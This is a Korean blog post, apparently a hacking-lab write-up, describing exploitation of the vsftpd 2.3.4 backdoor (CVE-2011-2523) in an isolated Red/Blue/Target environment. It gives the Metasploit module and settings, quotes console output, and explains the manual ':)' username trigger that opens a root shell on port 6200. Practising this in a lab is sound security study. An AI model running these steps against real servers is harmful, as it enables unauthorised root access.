Red, Blue, Target 환경을 통한 해킹 실습

공격 1 — vsftpd 백도어 (CVE-2011-2523)

TungTung0000 2026. 7. 6. 11:11

 

 

1. Metasploit에서 vsftpd 2.3.4 공격 환경 구성을 위한 대상 정보 설정

• msfconsole: Metasploit Framework(MSF)를 실행하는 명령어로 Metasploit은 알려진 취약점(Exploit)을 이용해 취약점이 실제로 악용 가능한지 검증하거나 시스템에 접근을 시도하는 모의해킹 프레임워크
• Metasploit 실행 과정
   msfconsole 실행 → Exploit 모듈 선택 → 공격대상(RHOSTS) 설정 → 공격(RUN) → 취약점 악용 가능 여부 확인
• 단계1. sudo msfconsole -q
            Metasploit Framework를 실행해 모의해킹 환경 진입
단계2. use exploit/unix/ftp/vsftpd_234_backdoor
            vsftpd 2.3.4(CVE-2011-2523) 취약점을 공격하는 Exploit 모듈 선택 및 사용할 Payload 자동 설정
• 단계3. set RHOSTS 192.168.100.20
            공격 대상 IP 설정
 단계4. set LHOST 192.168.100.10
            공격자의 IP 설정
단계5. set RPORT 2121
            공격 대상 서비스의 포트 설정
단계6. show options
             Exploit을 실행하기 전 필수 옵션이 올바르게 실행되었는지 확인

 

 

2. 공격

 - 자동 Exploit

[*] Started reverse TCP handler on 192.168.100.10:4444 → Target이 연결해 오기를 기다리는 상태
[*] Running automatic check  → 공격하기 전에 대상이 취약한지 자동으로 검사하는 과정
FTP banner hints its vulnerable:
220 (vsFTPd 2.3.4) 
FTP 배너를 확인한 결과가 반환되어 취약한 버전(vsftpd 2.3.4) 임을 확인
[+] The target appears to be vulnerable. Metasploit이 "이 서버는 CVE-2011-2523 공격이 가능한 것으로 보인다." 라고 판단
[+] Backdoor has been spawned! → 백도어가 활성화
‼️백도어 생성은 되었으나 쉘 연결은 되지 않았음

 

 - 수동 Exploit

# 원리: USER 필드에 :) 포함 → 6200번에 셸 바인딩
uid=0(root) gid=0(root) 결과 확인으로 root 쉘 획득 완료